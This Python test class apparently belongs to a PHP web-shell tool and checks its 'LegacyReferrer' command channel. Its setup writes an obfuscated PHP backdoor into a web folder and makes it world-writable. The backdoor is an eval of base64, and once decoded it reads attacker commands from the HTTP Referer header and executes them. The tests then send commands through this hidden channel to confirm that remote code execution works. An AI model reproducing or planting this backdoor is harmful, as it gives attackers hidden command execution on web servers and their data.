class LegacyReferrerChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyReferrer') def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions if ( subprocess.check_output( config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip() != config.script_folder_expected_perms ): raise DevException( "Error: give to the http user full permissions to the folder \'%s\'" % config.script_folder ) obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call( config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call( config.cmd_env_chmod_s_s % ('777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call( config.cmd_env_remove_s % cls.path, shell=True ) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20)